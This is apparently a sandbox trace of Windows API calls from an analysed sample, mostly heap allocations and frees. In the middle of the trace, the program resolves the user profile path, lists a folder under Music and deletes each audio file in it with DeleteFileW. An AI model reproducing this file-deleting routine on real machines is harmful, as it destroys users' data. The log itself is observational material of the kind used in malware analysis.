HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0251.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420888 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.843] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0251.844] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0251.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0251.845] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0251.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0251.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0251.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0251.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0251.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0251.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0251.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0251.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0251.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c8d0 [0251.846] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1", lpFilePart=0x8bedfc*="ditreDSOdEug3Tyrxp1") returned 0x37 [0251.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0251.846] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1")) returned 0x10 [0251.846] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d5f6c90, ftCreationTime.dwHighDateTime=0x1d4ce26, ftLastAccessTime.dwLowDateTime=0xa917faa0, ftLastAccessTime.dwHighDateTime=0x1d4c8af, ftLastWriteTime.dwLowDateTime=0xa917faa0, ftLastWriteTime.dwHighDateTime=0x1d4c8af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1278, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa58a0 [0251.847] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d5f6c90, ftCreationTime.dwHighDateTime=0x1d4ce26, ftLastAccessTime.dwLowDateTime=0xa917faa0, ftLastAccessTime.dwHighDateTime=0x1d4c8af, ftLastWriteTime.dwLowDateTime=0xa917faa0, ftLastWriteTime.dwHighDateTime=0x1d4c8af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1278, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0251.847] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99345930, ftCreationTime.dwHighDateTime=0x1d4d5a2, ftLastAccessTime.dwLowDateTime=0x53335040, ftLastAccessTime.dwHighDateTime=0x1d4c642, ftLastWriteTime.dwLowDateTime=0x53335040, ftLastWriteTime.dwHighDateTime=0x1d4c642, nFileSizeHigh=0x0, nFileSizeLow=0xcf6c, dwReserved0=0x1278, dwReserved1=0x4, cFileName="--VxK.wav", cAlternateFileName="")) returned 1 [0251.847] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\--VxK.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1\\--vxk.wav")) returned 1 [0251.848] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5645eb80, ftCreationTime.dwHighDateTime=0x1d4cca5, ftLastAccessTime.dwLowDateTime=0x1fc59450, ftLastAccessTime.dwHighDateTime=0x1d4c6cb, ftLastWriteTime.dwLowDateTime=0x1fc59450, ftLastWriteTime.dwHighDateTime=0x1d4c6cb, nFileSizeHigh=0x0, nFileSizeLow=0x10842, dwReserved0=0x1278, dwReserved1=0x4, cFileName="2ZVu6FoY_W3aJ.mp3", cAlternateFileName="2ZVU6F~1.MP3")) returned 1 [0251.848] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\2ZVu6FoY_W3aJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1\\2zvu6foy_w3aj.mp3")) returned 1 [0251.849] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe76fc6f0, ftCreationTime.dwHighDateTime=0x1d4d261, ftLastAccessTime.dwLowDateTime=0x2b9ebb00, ftLastAccessTime.dwHighDateTime=0x1d4ca34, ftLastWriteTime.dwLowDateTime=0x2b9ebb00, ftLastWriteTime.dwHighDateTime=0x1d4ca34, nFileSizeHigh=0x0, nFileSizeLow=0xcebf, dwReserved0=0x1278, dwReserved1=0x4, cFileName="8AbLF.mp3", cAlternateFileName="")) returned 1 [0251.849] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\8AbLF.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1\\8ablf.mp3")) returned 1 [0251.850] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0dd38a0, ftCreationTime.dwHighDateTime=0x1d4ce61, ftLastAccessTime.dwLowDateTime=0x81c72590, ftLastAccessTime.dwHighDateTime=0x1d4d37a, ftLastWriteTime.dwLowDateTime=0x81c72590, ftLastWriteTime.dwHighDateTime=0x1d4d37a, nFileSizeHigh=0x0, nFileSizeLow=0xcae5, dwReserved0=0x1278, dwReserved1=0x4, cFileName="AEnS.wav", cAlternateFileName="")) returned 1 [0251.850] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\AEnS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1\\aens.wav")) returned 1 [0251.850] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f6ed700, ftCreationTime.dwHighDateTime=0x1d4d01a, ftLastAccessTime.dwLowDateTime=0x62e08ed0, ftLastAccessTime.dwHighDateTime=0x1d4c689, ftLastWriteTime.dwLowDateTime=0x62e08ed0, ftLastWriteTime.dwHighDateTime=0x1d4c689, nFileSizeHigh=0x0, nFileSizeLow=0x10b86, dwReserved0=0x1278, dwReserved1=0x4, cFileName="Eu _r42wXHId.wav", cAlternateFileName="EU_R42~1.WAV")) returned 1 [0251.850] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\Eu _r42wXHId.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1\\eu _r42wxhid.wav")) returned 1 [0251.851] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e681910, ftCreationTime.dwHighDateTime=0x1d4ca25, ftLastAccessTime.dwLowDateTime=0xc1cf9330, ftLastAccessTime.dwHighDateTime=0x1d4cc85, ftLastWriteTime.dwLowDateTime=0xc1cf9330, ftLastWriteTime.dwHighDateTime=0x1d4cc85, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x1278, dwReserved1=0x4, cFileName="gjyA24B.wav", cAlternateFileName="")) returned 1 [0251.851] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\gjyA24B.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1\\gjya24b.wav")) returned 1 [0251.851] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e42a870, ftCreationTime.dwHighDateTime=0x1d4c879, ftLastAccessTime.dwLowDateTime=0x810fdb80, ftLastAccessTime.dwHighDateTime=0x1d4ca0e, ftLastWriteTime.dwLowDateTime=0x810fdb80, ftLastWriteTime.dwHighDateTime=0x1d4ca0e, nFileSizeHigh=0x0, nFileSizeLow=0x2669, dwReserved0=0x1278, dwReserved1=0x4, cFileName="Lc0t.m4a", cAlternateFileName="")) returned 1 [0251.851] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\Lc0t.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1\\lc0t.m4a")) returned 1 [0251.852] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad81650, ftCreationTime.dwHighDateTime=0x1d4d227, ftLastAccessTime.dwLowDateTime=0x72be0670, ftLastAccessTime.dwHighDateTime=0x1d4d408, ftLastWriteTime.dwLowDateTime=0x72be0670, ftLastWriteTime.dwHighDateTime=0x1d4d408, nFileSizeHigh=0x0, nFileSizeLow=0xc6ff, dwReserved0=0x1278, dwReserved1=0x4, cFileName="msxCo.wav", cAlternateFileName="")) returned 1 [0251.852] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\msxCo.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1\\msxco.wav")) returned 1 [0251.852] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x874f3de0, ftCreationTime.dwHighDateTime=0x1d4d13b, ftLastAccessTime.dwLowDateTime=0x47cf1560, ftLastAccessTime.dwHighDateTime=0x1d4ca82, ftLastWriteTime.dwLowDateTime=0x47cf1560, ftLastWriteTime.dwHighDateTime=0x1d4ca82, nFileSizeHigh=0x0, nFileSizeLow=0x15c85, dwReserved0=0x1278, dwReserved1=0x4, cFileName="mTL25UCJm5.mp3", cAlternateFileName="MTL25U~1.MP3")) returned 1 [0251.852] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\mTL25UCJm5.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1\\mtl25ucjm5.mp3")) returned 1 [0251.853] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34d110e0, ftCreationTime.dwHighDateTime=0x1d4d3cd, ftLastAccessTime.dwLowDateTime=0xf4ae4d90, ftLastAccessTime.dwHighDateTime=0x1d4c9e3, ftLastWriteTime.dwLowDateTime=0xf4ae4d90, ftLastWriteTime.dwHighDateTime=0x1d4c9e3, nFileSizeHigh=0x0, nFileSizeLow=0x18528, dwReserved0=0x1278, dwReserved1=0x4, cFileName="rZBgJQNiEYp.wav", cAlternateFileName="RZBGJQ~1.WAV")) returned 1 [0251.853] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\rZBgJQNiEYp.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1\\rzbgjqnieyp.wav")) returned 1 [0251.853] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22d0e430, ftCreationTime.dwHighDateTime=0x1d4d16e, ftLastAccessTime.dwLowDateTime=0x16cda280, ftLastAccessTime.dwHighDateTime=0x1d4c86e, ftLastWriteTime.dwLowDateTime=0x16cda280, ftLastWriteTime.dwHighDateTime=0x1d4c86e, nFileSizeHigh=0x0, nFileSizeLow=0x5dce, dwReserved0=0x1278, dwReserved1=0x4, cFileName="uF3n22OsH6anH.wav", cAlternateFileName="UF3N22~1.WAV")) returned 1 [0251.853] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\uF3n22OsH6anH.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1\\uf3n22osh6anh.wav")) returned 1 [0251.854] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d45660, ftCreationTime.dwHighDateTime=0x1d4c6ff, ftLastAccessTime.dwLowDateTime=0xfad65ad0, ftLastAccessTime.dwHighDateTime=0x1d4ce04, ftLastWriteTime.dwLowDateTime=0xfad65ad0, ftLastWriteTime.dwHighDateTime=0x1d4ce04, nFileSizeHigh=0x0, nFileSizeLow=0xf55a, dwReserved0=0x1278, dwReserved1=0x4, cFileName="zWYBx4.mp3", cAlternateFileName="")) returned 1 [0251.854] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1\\zWYBx4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ditredsodeug3tyrxp1\\zwybx4.mp3")) returned 1 [0251.854] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d45660, ftCreationTime.dwHighDateTime=0x1d4c6ff, ftLastAccessTime.dwLowDateTime=0xfad65ad0, ftLastAccessTime.dwHighDateTime=0x1d4ce04, ftLastWriteTime.dwLowDateTime=0xfad65ad0, ftLastWriteTime.dwHighDateTime=0x1d4ce04, nFileSizeHigh=0x0, nFileSizeLow=0xf55a, dwReserved0=0x1278, dwReserved1=0x4, cFileName="zWYBx4.mp3", cAlternateFileName="")) returned 0 [0251.854] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0251.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.855] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0251.855] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0251.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0251.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0251.856] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0251.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0251.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0251.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0251.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0251.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 